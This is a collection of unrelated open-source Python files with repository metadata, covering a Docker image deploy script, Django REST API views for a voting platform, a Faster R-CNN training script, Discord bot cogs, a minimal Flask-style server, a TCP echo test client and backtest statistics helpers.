os.system('cmd /c tsc')
bundle('./Js', '../Scripts/Caprica.js')
``` |
{
"source": "jimmyharris/pyrex",
"score": 2
} |
#### File: pyrex/ci/deploy_docker.py
```python
import argparse
import os
import requests
import subprocess
import sys
def main():
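    # Overall flow: optionally log in to Docker Hub, refuse to overwrite existing
    # version tags (only 'latest' and 'next' may be re-pushed), then build, test,
    # and push the requested image.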
parser = argparse.ArgumentParser(description='Deploy docker images')
parser.add_argument('--login', action='store_true', help='Login to Dockerhub using the environment variables $DOCKER_USERNAME and $DOCKER_PASSWORD')
parser.add_argument('image', metavar='IMAGE[:TAG]', help='The image to build and push')
args = parser.parse_args()
this_dir = os.path.abspath(os.path.dirname(sys.argv[0]))
docker_dir = os.path.join(this_dir, '..', 'docker')
image = args.image
if ':' in image:
image, tag = image.split(':', 1)
elif 'TRAVIS_TAG' in os.environ:
tag = os.environ['TRAVIS_TAG'] or 'latest'
else:
tag = 'latest'
repo = 'garminpyrex/%s' % image
name = '%s:%s' % (repo, tag)
if args.login:
print("Logging in...")
for v in ('DOCKER_USERNAME', 'DOCKER_PASSWORD'):
if v not in os.environ:
print("$%s is missing from the environment. Images will not be deployed" % v)
return 0
with subprocess.Popen(['docker', 'login', '--username', os.environ['DOCKER_USERNAME'], '--password-stdin'], stdin=subprocess.PIPE) as p:
try:
p.communicate(os.environ['DOCKER_PASSWORD'].encode('utf-8'), timeout=60)
except subprocess.TimeoutExpired:
print("Docker login timed out")
p.kill()
p.communicate()
if p.returncode != 0:
print("Docker login failed. Images will not be deployed")
return 0
print("Deploying %s..." % name)
# Get a login token for the docker registry and download the manifest
token = requests.get("https://auth.docker.io/token?service=registry.docker.io&scope=repository:%s:pull" % repo, json=True).json()["token"]
manifest = requests.get(
"https://registry.hub.docker.com/v2/%s/manifests/%s" % (repo, tag),
headers={"Authorization": "Bearer %s" % token},
json=True
).json()
found_manifest = (manifest.get('name', '') == repo)
# Only 'latest' and 'next' tags are allowed to be overwritten
if found_manifest and tag != 'latest' and tag != 'next':
print("Tag '%s' already exists. Refusing to push" % tag)
return 1
print("Building", name)
try:
subprocess.check_call(['docker', 'build', '-t', name, '-f', '%s/Dockerfile' % docker_dir,
'--build-arg', 'PYREX_BASE=%s' % image, '--', docker_dir])
except subprocess.CalledProcessError as e:
print("Building failed!")
return 1
print("Testing", name)
try:
env = os.environ.copy()
env['TEST_IMAGE'] = image
env['TEST_PREBUILT_TAG'] = tag
subprocess.check_call(['%s/test.py' % this_dir, '-vbf'], env=env, cwd=os.path.join(this_dir, '..'))
except subprocess.CalledProcessError as e:
print("Testing failed!")
return 1
print("Pushing", name)
try:
subprocess.check_call(['docker', 'push', name])
except subprocess.CalledProcessError as e:
print("Pushing failed!")
return 1
return 0
if __name__ == "__main__":
sys.exit(main())
``` |
{
"source": "jimmyhealer/NTOUvoteplatformBackEnd",
"score": 2
} |
#### File: NTOUvoteplatformBackEnd/announcement/views.py
```python
from announcement.models import Announcement
from announcement.serializers import AnnouncementSerializer
from votebd.core.decorators import login_required
from utils.api import APIView, validate_serializer
class AnnouncementList(APIView):
"""
    List all announcements, or create a new announcement.
"""
def get(self, request):
announcement = Announcement.objects.all()
data = self.paginate_data(request, announcement, AnnouncementSerializer)
return self.success(data = data)
#@validate_serializer(AnnouncementSerializer)
@login_required
def post(self, request):
serializer = AnnouncementSerializer(data = request.data)
if serializer.is_valid():
serializer.save(author = request.user)
return self.success(data = serializer.data, status = 201)
return self.error(msg = serializer.errors, status = 400)
class AnnouncementDetail(APIView):
"""
    Retrieve, update or delete an announcement.
"""
def get_object(self, pk):
try:
return Announcement.objects.get(pk = pk)
except Announcement.DoesNotExist:
return self.error(status = 404)
def get(self, request, pk, format = None):
announcement = self.get_object(pk)
serializer = AnnouncementSerializer(announcement)
return self.success(data = serializer.data)
@login_required
def put(self, request, pk, format = None):
announcement = self.get_object(pk)
serializer = AnnouncementSerializer(announcement, data = request.data)
if serializer.is_valid():
serializer.save()
return self.success(data = serializer.data)
return self.error(msg = serializer.errors, status = 400)
@login_required
def delete(self, request, pk, format = None):
announcement = self.get_object(pk)
announcement.delete()
return self.success(status = 204)
```
#### File: votebd/core/decorators.py
```python
import functools
from rest_framework.response import Response
class BasePermissionDecorator(object):
def __init__(self, func):
self.func = func
def __get__(self, obj, obj_type):
return functools.partial(self.__call__, obj)
def error(self, data):
return Response({"error": "permission-denied", "data": data, 'status': 403})
def __call__(self, *args, **kwargs):
self.request = args[1]
if self.check_permission():
# if self.request.user.is_active:
# return self.error("Your account is disabled")
return self.func(*args, **kwargs)
else:
return self.error("Please login first")
def check_permission(self):
raise NotImplementedError()
class login_required(BasePermissionDecorator):
def check_permission(self):
return self.request.user.is_authenticated
```
#### File: NTOUvoteplatformBackEnd/voteEvent/views.py
```python
from utils.api import APIView, validate_serializer
from votebd.core.decorators import login_required
from voteEvent.serializers import VoteEventSerializer
from voteEvent.models import VoteEvent
from django.utils import timezone
from django.views.decorators.csrf import csrf_exempt
# Create your views here.
class VoteEventList(APIView):
def get(self, request):
publish_voteEvents = VoteEvent.objects.filter(published__lte = timezone.now())
for publish_voteEvent in publish_voteEvents:
publish_voteEvent.publish_post()
publish_voteEvent.save()
voteEvents = VoteEvent.objects.all()
data = self.paginate_data(request, voteEvents, VoteEventSerializer)
return self.success(data = data)
#@validate_serializer(VoteEventSerializer)
@login_required
def post(self, request):
serializer = VoteEventSerializer(data = request.data)
if serializer.is_valid():
serializer.save(author = request.user)
return self.success(data = serializer.data, status = 201)
return self.error(msg = serializer.errors, status = 400)
class VoteEventDetail(APIView):
def get_object(self, pk):
try:
return VoteEvent.objects.get(pk = pk)
except VoteEvent.DoesNotExist:
return self.error(status = 404)
def get(self, request, pk):
voteEvent = self.get_object(pk)
serializer = VoteEventSerializer(voteEvent)
return self.success(data = serializer.data)
@login_required
def put(self, request, pk):
voteEvent = self.get_object(pk)
serializer = VoteEventSerializer(voteEvent, data = request.data)
if serializer.is_valid():
serializer.save()
return self.success(data = serializer.data)
return self.error(msg = serializer.errors, status = 400)
@login_required
def delete(self, request, pk):
voteEvent = self.get_object(pk)
voteEvent.delete()
return self.success(status = 204)
``` |
{
"source": "JimmyHHua/Poster_faster-rcnn",
"score": 2
} |
#### File: JimmyHHua/Poster_faster-rcnn/train.py
```python
import os
import ipdb
import matplotlib
import torch as t
from tqdm import tqdm
import numpy as np
from scipy.misc import imsave
from utils.config import opt
from data.dataset import Dataset, TestDataset, inverse_normalize
from model import FasterRCNNVGG16
from torch.autograd import Variable
from torch.utils import data as data_
from trainer import FasterRCNNTrainer
from utils import array_tool as at
from utils.vis_tool import visdom_bbox
from data.util import read_image
from utils.eval_tool import eval_detection_voc
# fix for ulimit
# https://github.com/pytorch/pytorch/issues/973#issuecomment-346405667
import resource
rlimit = resource.getrlimit(resource.RLIMIT_NOFILE)
resource.setrlimit(resource.RLIMIT_NOFILE, (20480, rlimit[1]))
matplotlib.use('agg')
def eval(dataloader, faster_rcnn, test_num=133):
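    # Run the detector over the test dataloader, collect predictions and ground
    # truth, and score them with the PASCAL VOC (2007 11-point) mAP metric.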
pred_bboxes, pred_labels, pred_scores = list(), list(), list()
gt_bboxes, gt_labels, gt_difficults = list(), list(), list()
for ii, (imname, imgs, gt_bboxes_, gt_labels_, gt_difficults_) in tqdm(enumerate(dataloader)):
#print(imname,imgs.shape)
#print(imgs.shape,gt_bboxes_,gt_labels_)
pred_bboxes_, pred_labels_, pred_scores_ = faster_rcnn.predict(imgs, visualize=True)
# for ii, (imname,imgs, sizes, gt_bboxes_, gt_labels_, gt_difficults_) in tqdm(enumerate(dataloader)):
# sizes = [sizes[0][0], sizes[1][0]]
# pred_bboxes_, pred_labels_, pred_scores_ = faster_rcnn.predict(imgs, [sizes])
gt_bboxes += list(gt_bboxes_.numpy())
gt_labels += list(gt_labels_.numpy())
gt_difficults += list(gt_difficults_.numpy())
pred_bboxes += pred_bboxes_
pred_labels += pred_labels_
pred_scores += pred_scores_
if ii == test_num: break
result = eval_detection_voc(
pred_bboxes, pred_labels, pred_scores,
gt_bboxes, gt_labels, gt_difficults,
use_07_metric=True)
return result
def train(**kwargs):
opt._parse(kwargs)
dataset = Dataset(opt)
print('load data')
dataloader = data_.DataLoader(dataset, \
batch_size=1, \
shuffle=True, \
# pin_memory=True,
num_workers=opt.num_workers)
testset = TestDataset(opt)
test_dataloader = data_.DataLoader(testset,
batch_size=1,
num_workers=opt.test_num_workers,
shuffle=False, \
pin_memory=True
)
faster_rcnn = FasterRCNNVGG16()
print('model construct completed')
trainer = FasterRCNNTrainer(faster_rcnn).cuda()
if opt.load_path:
trainer.load(opt.load_path)
print('load pretrained model from %s' % opt.load_path)
print('the labels is :',dataset.db.label_names)
#trainer.vis.text(dataset.db.label_names, win='labels')
best_map = 0
lr_ = opt.lr
for epoch in range(14):
trainer.reset_meters()
print('hello')
for ii, (img, bbox_, label_, scale) in tqdm(enumerate(dataloader)):
scale = at.scalar(scale)
img, bbox, label = img.cuda().float(), bbox_.cuda(), label_.cuda()
img, bbox, label = Variable(img), Variable(bbox), Variable(label)
trainer.train_step(img, bbox, label, scale)
#print('hahah')
# if ii==5:
# break
# if (ii + 1) % opt.plot_every == 0:
# if os.path.exists(opt.debug_file):
# ipdb.set_trace()
# # plot loss
# #trainer.vis.plot_many(trainer.get_meter_data())
# #print(trainer.get_meter_data())
# # plot groud truth bboxes
# ori_img_ = inverse_normalize(at.tonumpy(img[0]))
# gt_img = visdom_bbox(ori_img_,
# at.tonumpy(bbox_[0]),
# at.tonumpy(label_[0]))
# trainer.vis.img('gt_img', gt_img)
# # plot predicti bboxes
# _bboxes, _labels, _scores = trainer.faster_rcnn.predict([ori_img_], visualize=True)
# pred_img = visdom_bbox(ori_img_,
# at.tonumpy(_bboxes[0]),
# at.tonumpy(_labels[0]).reshape(-1),
# at.tonumpy(_scores[0]))
# trainer.vis.img('pred_img', pred_img)
# # rpn confusion matrix(meter)
# #trainer.vis.text(str(trainer.rpn_cm.value().tolist()), win='rpn_cm')
# # roi confusion matrix
# trainer.vis.img('roi_cm', at.totensor(trainer.roi_cm.conf, False).float())
eval_result = eval(test_dataloader, faster_rcnn, test_num=opt.test_num)
print('^^^^^^^^^^^^^^^^^^^^^^^^^^^')
if eval_result['map'] > best_map:
best_map = eval_result['map']
best_path = trainer.save(best_map=best_map)
print('map:',eval_result['map'],'best_map:',best_map)
if epoch == 9:
trainer.load(best_path)
trainer.faster_rcnn.scale_lr(opt.lr_decay)
lr_ = lr_ * opt.lr_decay
print('*************************')
#trainer.vis.plot('test_map', eval_result['map'])
# log_info = 'lr:{}, map:{},loss:{}'.format(str(lr_),
# str(eval_result['map']),
# str(trainer.get_meter_data()))
# #trainer.vis.log(log_info)
print('***************: this is epoch: ', epoch)
# if epoch == 1:
# break
def test_me(**kwargs):
opt._parse(kwargs)
img=read_image('/home/huachunrui/model_h5/img/tim.jpg')
print('1: ',img.shape)
img=t.from_numpy(img)[None]
print('2: ',img.shape)
faster_rcnn=FasterRCNNVGG16()
print('model construct completed')
trainer=FasterRCNNTrainer(faster_rcnn).cuda()
print("load all weights")
trainer.load(opt.load_path)
pred_bboxes_, pred_labels_, pred_scores_ = faster_rcnn.predict(img, visualize=True)
print('img numpy is: ',at.tonumpy(img[0]))
pred_img = visdom_bbox(at.tonumpy(img[0]),
at.tonumpy(pred_bboxes_[0]),
at.tonumpy(pred_labels_[0]).reshape(-1),
at.tonumpy(pred_scores_[0]).reshape(-1))
imsave('/home/huachunrui/model_h5/img/000b.jpg',(255*pred_img).transpose(1,2,0))
print('pass')
def test_jimmy(**kwargs):
opt._parse(kwargs)
print('load data')
testset=TestDataset(opt)
test_dataloader=data_.DataLoader(testset,batch_size=1,num_workers=opt.test_num_workers,shuffle=False,pin_memory=True)
faster_rcnn=FasterRCNNVGG16()
print('model construct completed')
trainer=FasterRCNNTrainer(faster_rcnn).cuda()
print("load all weights")
trainer.load(opt.load_path)
pred_bboxes, pred_labels, pred_scores = list(), list(), list()
imnames, gt_bboxes, gt_labels, gt_difficults = list(), list(), list(),list()
for ii, (imname, imgs, gt_bboxes_, gt_labels_, gt_difficults_) in tqdm(enumerate(test_dataloader)):
#print(imname,imgs.shape)
#print(imgs.shape,gt_bboxes_,gt_labels_)
pred_bboxes_, pred_labels_, pred_scores_ = faster_rcnn.predict(imgs, visualize=True)
ori_img = visdom_bbox(at.tonumpy(imgs[0]),
at.tonumpy(gt_bboxes_[0]),
at.tonumpy(gt_labels_[0]).reshape(-1))
ori_file=os.path.join('/home/huachunrui/model_h5/img/img-0.78/'+'{}_origin.jpg'.format(ii))
imsave(ori_file,(255*at.tonumpy(ori_img)).transpose(1,2,0))
pred_img = visdom_bbox(at.tonumpy(imgs[0]),
at.tonumpy(pred_bboxes_[0]),
at.tonumpy(pred_labels_[0]).reshape(-1),
at.tonumpy(pred_scores_[0]).reshape(-1))
#print(pred_img.shape,pred_img)
pre_file=os.path.join('/home/huachunrui/model_h5/img/img-0.77/'+'{}_detected.jpg'.format(ii))
imsave(pre_file,(255*pred_img).transpose(1,2,0))
if ii==2:
break
gt_bboxes += list(gt_bboxes_.numpy())
gt_labels += list(gt_labels_.numpy())
gt_difficults += list(gt_difficults_.numpy())
imnames += imname
pred_bboxes += pred_bboxes_
pred_labels += pred_labels_
pred_scores += pred_scores_
if ii == opt.test_num:#132
np.save('/home/huachunrui/model_h5/img/img-0.78/imnames.npy',imnames)
np.save('/home/huachunrui/model_h5/img/img-0.78/gt_bboxes.npy',gt_bboxes)
np.save('/home/huachunrui/model_h5/img/img-0.78/gt_labels.npy',gt_labels)
np.save('/home/huachunrui/model_h5/img/img-0.78/pred_bboxes.npy',pred_bboxes)
np.save('/home/huachunrui/model_h5/img/img-0.78/pred_labels.npy',pred_labels)
np.save('/home/huachunrui/model_h5/img/img-0.78/pred_scores.npy',pred_scores)
break
result = eval_detection_voc(
pred_bboxes, pred_labels, pred_scores,
gt_bboxes, gt_labels, gt_difficults,
use_07_metric=True)
print("mAP: ",result['map'])
print('Everything is ok !')
def test(**kwargs):
opt._parse(kwargs)
dataset=Dataset(opt)
print('load data')
testset=TestDataset(opt)
test_dataloader=data_.DataLoader(testset,batch_size=1,num_workers=opt.test_num_workers,shuffle=False,pin_memory=True)
faster_rcnn=FasterRCNNVGG16()
print('model construct completed')
trainer=FasterRCNNTrainer(faster_rcnn).cuda()
print("load all weights")
#opt.load_path='/home/xulu/model_h5/checkpoints/fasterrcnn_04251612_0.784629387622'
trainer.load(opt.load_path)
#if opt.load_path:
# trainer.load(opt.load_path)
# print('load pretrained model from %s'% opt.load_path)
pred_bboxes, pred_labels, pred_scores = list(), list(), list()
imnames, gt_bboxes, gt_labels, gt_difficults = list(), list(), list(),list()
for ii, (imname, imgs, sizes, gt_bboxes_, gt_labels_, gt_difficults_) in tqdm(enumerate(test_dataloader)):
print(imname,imgs[0].shape)
# print(imgs.shape,gt_bboxes_,gt_labels_)
sizes = [sizes[0][0], sizes[1][0]]
# print(sizes)
pred_bboxes_, pred_labels_, pred_scores_ = faster_rcnn.predict(imgs, [sizes])
# print(pred_bboxes_, pred_labels_, pred_scores_)
# plot groud truth bboxes
ori_img_ = inverse_normalize(at.tonumpy(imgs[0]))
imsave('/home/huachunrui/result_test_h5/a.jpg',(255*ori_img_).transpose(1,2,0))
gt_img = visdom_bbox(ori_img_,
at.tonumpy(gt_bboxes_[0]),
at.tonumpy(gt_labels_[0]))
# print(gt_img.shape)
imsave('/home/huachunrui/result_test_h5/b.jpg',(255*gt_img).transpose(1,2,0))
# plot predicti bboxes
pred_img = visdom_bbox(gt_img,
at.tonumpy(pred_bboxes_[0]),
at.tonumpy(pred_labels_[0]).reshape(-1),
at.tonumpy(pred_scores_[0]))
# print(pred_img.shape,pred_img)
imsave('/home/huachunrui/result_test_h5/c.jpg',(255*pred_img).transpose(1,2,0))
gt_bboxes += list(gt_bboxes_.numpy())
gt_labels += list(gt_labels_.numpy())
gt_difficults += list(gt_difficults_.numpy())
imnames += imname
pred_bboxes += pred_bboxes_
pred_labels += pred_labels_
pred_scores += pred_scores_
if ii == opt.test_num:#132
np.save('/home/huachunrui/result_test_h5/imnames.npy',imnames)
np.save('/home/huachunrui/result_test_h5/gt_bboxes.npy',gt_bboxes)
np.save('/home/huachunrui/result_test_h5/gt_labels.npy',gt_labels)
np.save('/home/huachunrui/result_test_h5/pred_bboxes.npy',pred_bboxes)
np.save('/home/huachunrui/result_test_h5/pred_labels.npy',pred_labels)
np.save('/home/huachunrui/result_test_h5/pred_scores.npy',pred_scores)
break
result = eval_detection_voc(
pred_bboxes, pred_labels, pred_scores,
gt_bboxes, gt_labels, gt_difficults,
use_07_metric=True)
print("mAP: ",result['map'])
if __name__ == '__main__':
import fire
fire.Fire()
``` |
{
"source": "jimmyhmiller/one-hundred-lines-or-less",
"score": 3
} |
#### File: python/flask/__init__.py
```python
from itertools import imap, ifilter
from functools import wraps
import json
import sys, os
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from http import create_server
from inspect import getargspec
not_found = {
"status": 404,
"headers": {"Content-type": "application/json"},
"body": json.dumps({"error": "route not found"})
}
def plain_text(body):
return {
"status": 200,
"headers": {"Content-type": "text/plain"},
"body": body
}
def wrap_response(response):
if isinstance(response, str):
return plain_text(response)
else:
return response
def call_handler(handler, data):
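    # Dispatch on the handler's arity: one-argument handlers receive the request
    # dict, zero-argument handlers are called with nothing, and plain-string
    # return values are wrapped into a text/plain response.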
arity = len(getargspec(handler).args)
if arity == 1:
return wrap_response(handler(data))
else:
return wrap_response(handler())
class Flask(object):
"""docstring for Vial"""
def __init__(self, name):
self.name = name
self.routes = {}
def handler(self, request):
route_handler = self.routes.get(request["path"], None)
if route_handler:
return call_handler(route_handler, request)
else:
return not_found
def route(self, path):
def decorator(f):
self.routes[path] = f
return f
return decorator
def run(self):
create_server(self.handler)
app = Flask(__name__)
@app.route("/")
def hello():
return "Hello World!"
if __name__ == '__main__':
app.run()
``` |
{
"source": "jimmyhua123/discord-bot-for-public",
"score": 2
} |
#### File: jimmyhua123/discord-bot-for-public/botTerry.py
```python
import discord
from discord.ext import commands
import json
import random
import os
intents = discord.Intents.all()#discord 1.5 update
from googleapiclient.discovery import build
with open('setting.json','r',encoding='utf8')as jFile: #r = read mode, opened as jFile
    jdata=json.load(jFile)#load the json settings into jdata
api_key="hi"
bot = commands.Bot(command_prefix='//',intents=intents)#the prefix typed before every command
@bot.event #automatically triggered event
async def on_ready(): #redefine the event handler
print(">>Bot is online<<")
#channel = bot.get_channel(int(jdata["test_channel"]))
#await channel.send('>>Bot is online<<')
@bot.command()
async def load(ctx,extension):
bot.load_extension(f'cmds.{extension}')
await ctx.send(f'Loaded{extension} done')
@bot.command()
async def unload(ctx,extension):
bot.unload_extension(f'cmds.{extension}')
await ctx.send(f'Unloaded{extension} done')
#reload is temporarily broken, not sure why; possibly related to help showing two identical entries
@bot.command()
async def reload(ctx,extension):
bot.reload_extension(f'cmds.{extension}')
await ctx.send(f'Reloaded{extension} done')
@bot.command(aliases=["show"])
async def showpic(ctx,*,search):
ran = random.randint(0, 9)
resource = build("customsearch", "v1", developerKey=api_key).cse()
result = resource.list(
q=f"{search}", cx="020feebf5412510ee", searchType="image").execute()
url = result["items"][ran]["link"]
embed1 = discord.Embed(title=f"Here Your Image ({search}) work?")
embed1.set_image(url=url)
await ctx.send(embed=embed1)
for Filename in os.listdir('./cmds'): #./ = relative path
    if Filename.endswith('.py'):
        print(Filename)
        bot.load_extension(f'cmds.{Filename[:-3]}') #[:-3] strips the ".py" extension
if __name__ == "__main__":
    bot.run(jdata['TOKEN'])#the token must be a string
```
#### File: discord-bot-for-public/cmds/main.py
```python
import discord
from discord import file
from discord.ext import commands
from discord.ext.commands.core import command
from core.classes import Cog_Extension
import json,random
import datetime
with open('setting.json','r',encoding='utf8')as jFile: #r = read mode, opened as jFile
    jdata=json.load(jFile)#load the json settings into jdata
class Main(Cog_Extension):
@commands.command()
    async def online_list(self,ctx):#ctx.guild = the server the command was invoked in
        for member in ctx.guild.members:
            if str(member.status) == 'online' and member.bot==False:#note: status is compared as a string
                await ctx.send(f"{member}'s status is {member.status}")
    @commands.command()
    async def offline_list(self,ctx):#ctx.guild = the server the command was invoked in
        for member in ctx.guild.members:
            if str(member.status) == 'offline' and member.bot==False:#note: status is compared as a string
                await ctx.send(f"{member}'s status is {member.status}")
@commands.command()
async def jojo(self,ctx):#embed
        embed=discord.Embed(title="SHIZAAAAAAAA",url="https://www.youtube.com/watch?v=0-Kda5ZLN5s",color=0x4c712d)
embed.set_author(name="Majaja")
embed.add_field(name="test", value='1', inline=True)
embed.add_field(name='2', value='3', inline=True)
embed.add_field(name='4', value='5', inline=True)
embed.set_footer(text='test123456')
await ctx.send(embed=embed)
    @commands.command()#echo a message
async def sayd(self,ctx,*,msg):
await ctx.message.delete()
await ctx.send(msg)
    @commands.command()#echo a message
async def say10times(self,ctx,*,msg):
await ctx.message.delete()
for i in range(1,11):
await ctx.send(msg)
    @commands.command()#clean up messages
async def cleanmsg(self,ctx,num:int):
await ctx.channel.purge(limit=num+1)
await ctx.send(f'already cleaned ,{num} message')
@commands.command()
    async def rand_online_squad(self,ctx):#ctx.guild = the server the command was invoked in
        # print(ctx.guild.members)
        online =[]
        for member in ctx.guild.members:
            #print(member.status)
            #await ctx.send(f"{member}'s status is {member.status}")
            if str(member.status) == 'online' and member.bot==False:#note: status is compared as a string
                online.append(member.name)#collect the name
        #print(online)
        random_online=[]
        random_online = random.sample(online,k=10)
        for squad in range(2):
            rlist = random.sample(random_online,k=5)#randomly pick 5 names per squad until done
            await ctx.send(f'Squad {squad+1} is {rlist}')
for name in rlist:
random_online.remove(name)
@commands.command()
    async def rand_offline_squad(self,ctx):#ctx.guild = the server the command was invoked in
        offline =[]
        for member in ctx.guild.members:
            if str(member.status) == 'offline' and member.bot==False:#note: status is compared as a string
                offline.append(member.name)#collect the name
        random_offline=[]
        random_offline = random.sample(offline,k=15)
        for squad in range(3):
            rlist = random.sample(random_offline,k=5)
            await ctx.send(f'Squad {squad+1} is {rlist}')
            for name in rlist:
                random_offline.remove(name)
        #for x in random.sample(offline,k=4):#sample == no duplicates
@commands.command()
async def load(self,ctx):
await ctx.send('Shutting down...')
db.commit()
self.bot.scheduler.shutdown()
await self.bot.logout()
def setup(bot):
    bot.add_cog(Main(bot))#register the cog; bot is passed back to __init__
```
#### File: discord-bot-for-public/cmds/permissions.py
```python
import discord
from discord import file
from discord.ext import commands
from discord.ext.commands.core import command
from core.classes import Cog_Extension
import json,random
import datetime
with open('setting.json','r',encoding='utf8')as jFile: #r = read mode, opened as jFile
    jdata=json.load(jFile)#load the json settings into jdata
class permissions(Cog_Extension):
    def __init__(self,*args,**kwargs):#** == variable keyword arguments; def __init__() boilerplate, see https://www.youtube.com/watch?v=dBeC-SM-DNw&list=PLSCgthA1Anif1w6mKM3O6xlBGGypXtrtN&index=14&t=14s&ab_channel=Proladon
        super().__init__(*args,**kwargs)#super().__init__ => inherit the base cog's setup again
try:
with open("./banlist.txt","r",encoding="utf-8")as f:
self.banlist=[int(line.strip())for line in f.readlines()]
except FileNotFoundError:
self.banlist=[]
    @commands.command()#reply
async def hii(self,ctx):
await ctx.send('hello')
def setup(bot):
    bot.add_cog(permissions(bot))#register the cog; bot is passed back to __init__
```
#### File: discord-bot-for-public/cmds/task.py
```python
import discord
from discord import file
from discord.ext import commands
from discord.ext.commands.core import command
from core.classes import Cog_Extension
import json,asyncio,datetime
with open('setting.json','r',encoding='utf8')as jFile: #r = read mode, opened as jFile
    jdata=json.load(jFile)#load the json settings into jdata
#run commands at a specified time / at fixed intervals - asynchronous execution / coroutine concept
class Task(Cog_Extension):
    def __init__(self,*args,**kwargs):#** == variable keyword arguments; def __init__() boilerplate, see https://www.youtube.com/watch?v=dBeC-SM-DNw&list=PLSCgthA1Anif1w6mKM3O6xlBGGypXtrtN&index=14&t=14s&ab_channel=Proladon
        super().__init__(*args,**kwargs)#super().__init__ => inherit the base cog's setup again#no decorator needed
self.counter=0
async def interval():
            await self.bot.wait_until_ready() #wait until the bot is ready
self.channel = self.bot.get_channel(int(jdata["test_channel"]))
while not self.bot.is_closed():#whilenotclose
pass
#await self.channel.send('hi bot is running')
                #await asyncio.sleep(2)#unit: seconds
#self.bg_task=self.bot.loop.create_task(interval())
async def time_task():
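            # Background loop: every 2 seconds compare the current HHMM time against the
            # value stored in setting.json and post to the channel when they first match.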
            await self.bot.wait_until_ready() #wait until the bot is ready
self.channel = self.bot.get_channel(888174408026456114)
while not self.bot.is_closed():#while bot not close
                now_time=datetime.datetime.now().strftime("%H%M")#hours and minutes only
with open('setting.json','r',encoding='utf8')as jFile:
jdata=json.load(jFile)
if now_time == jdata['time'] and self.counter==0:
self.counter = 1
await self.channel.send("task working")
await asyncio.sleep(2)
#elif now_time != jdata['time'] and self.counter==0:
# self.counter = 1
# await self.channel.send("task not working")
# await asyncio.sleep(2)
else:
await asyncio.sleep(2)
pass
self.bg_task=self.bot.loop.create_task(time_task())
@commands.command()
    async def set_channel(self,ctx,ch:int): #ch:int declares the parameter as an int
self.channel=self.bot.get_channel(ch)
await ctx.send(f'Set channel:{self.channel.mention}')
@commands.command()
async def set_time(self,ctx, time): #
self.counter = 0
with open('setting.json','r',encoding='utf8')as jFile:
jdata=json.load(jFile)
jdata['time']=time
        with open('setting.json','w',encoding='utf8')as jFile:#w => write mode
            json.dump(jdata,jFile,indent=4)#indent by 4 spaces
await ctx.send(f'Set time:{int(jdata["time"])}')
def setup(bot):
bot.add_cog(Task(bot))
``` |
{
"source": "jimmy-huang/zephyr.js",
"score": 3
} |
#### File: tests/tools/test-tcp4-client.py
```python
import time
import socket
def main():
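    # Simple echo client used by the zephyr.js test tools: connect to the board at
    # 192.0.2.1:9876 and echo every received message back until "close" arrives.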
print "Socket client creat successful"
host = "192.0.2.1"
port = 9876
bufSize = 1024
addr = (host, port)
Timeout = 300
mySocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
mySocket.settimeout(Timeout)
mySocket.connect(addr)
while 1:
try :
Data = mySocket.recv(bufSize)
Data = Data.strip()
print "Got data: ", Data
time.sleep(2)
if Data == "close":
mySocket.close()
print "close socket"
break
else:
mySocket.sendall(Data)
print "Send data: ", Data
except KeyboardInterrupt :
print "exit client"
break
except :
print "time out"
continue
if __name__ == "__main__" :
main()
``` |
{
"source": "jimmyhzuk/pinkfish",
"score": 3
} |
#### File: pinkfish/pinkfish/statistics.py
```python
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
# Other imports
import pandas as pd
import numpy as np
import operator
import math
from datetime import datetime
from dateutil.relativedelta import relativedelta
from numpy.lib.stride_tricks import as_strided
#####################################################################
# CONSTANTS
TRADING_DAYS_PER_YEAR = 252
TRADING_DAYS_PER_MONTH = 20
TRADING_DAYS_PER_WEEK = 5
#####################################################################
# HELPER FUNCTIONS
def _difference_in_years(start, end):
""" calculate the number of years between two dates """
diff = end - start
diff_in_years = (diff.days + diff.seconds/86400)/365.2425
return diff_in_years
def _get_trade_bars(ts, tlog, op):
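    # For every trade whose P&L satisfies `op` (e.g. operator.gt for winners),
    # count the number of bars between its entry and exit dates.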
l = []
for row in tlog.itertuples():
if op(row.pl_cash, 0):
l.append(len(ts[row.entry_date:row.exit_date].index))
return l
def currency(amount):
if amount >= 0:
return '${:,.2f}'.format(amount)
else:
return '-${:,.2f}'.format(-amount)
#####################################################################
# OVERALL RESULTS
def beginning_balance(capital):
return capital
def ending_balance(dbal):
return dbal.iloc[-1]['close']
def total_net_profit(tlog):
return tlog.iloc[-1]['cumul_total']
def gross_profit(tlog):
return tlog[tlog['pl_cash'] > 0].sum()['pl_cash']
def gross_loss(tlog):
return tlog[tlog['pl_cash'] < 0].sum()['pl_cash']
def profit_factor(tlog):
if gross_profit(tlog) == 0: return 0
if gross_loss(tlog) == 0: return 1000
return gross_profit(tlog) / gross_loss(tlog) * -1
def return_on_initial_capital(tlog, capital):
return total_net_profit(tlog) / capital * 100
def _cagr(B, A, n):
""" calculate compound annual growth rate """
return (math.pow(B / A, 1 / n) - 1) * 100
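# e.g. _cagr(200000, 100000, 2) ~= 41.42: doubling the balance over two years
# corresponds to a compound annual growth rate of about 41.4%.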
def annual_return_rate(end_balance, capital, start, end):
B = end_balance
A = capital
n = _difference_in_years(start, end)
return _cagr(B, A, n)
def trading_period(start, end):
diff = relativedelta(end, start)
return '{} years {} months {} days'.format(diff.years, diff.months, diff.days)
def _total_days_in_market(dbal):
n = (dbal['shares'] > 0).sum()
if dbal.iloc[-2]['shares'] > 0:
n += 1
return n
def pct_time_in_market(dbal):
return _total_days_in_market(dbal) / len(dbal) * 100
#####################################################################
# SUMS
def total_num_trades(tlog):
return len(tlog.index)
def trades_per_year(tlog, start, end):
diff = relativedelta(end, start)
years = diff.years + diff.months/12 + diff.days/365
return total_num_trades(tlog) / years
def num_winning_trades(tlog):
return (tlog['pl_cash'] > 0).sum()
def num_losing_trades(tlog):
return (tlog['pl_cash'] < 0).sum()
def num_even_trades(tlog):
return (tlog['pl_cash'] == 0).sum()
def pct_profitable_trades(tlog):
if total_num_trades(tlog) == 0: return 0
return num_winning_trades(tlog) / total_num_trades(tlog) * 100
#####################################################################
# CASH PROFITS AND LOSSES
def avg_profit_per_trade(tlog):
if total_num_trades(tlog) == 0: return 0
return total_net_profit(tlog) / total_num_trades(tlog)
def avg_profit_per_winning_trade(tlog):
if num_winning_trades(tlog) == 0: return 0
return gross_profit(tlog) / num_winning_trades(tlog)
def avg_loss_per_losing_trade(tlog):
if num_losing_trades(tlog) == 0: return 0
return gross_loss(tlog) / num_losing_trades(tlog)
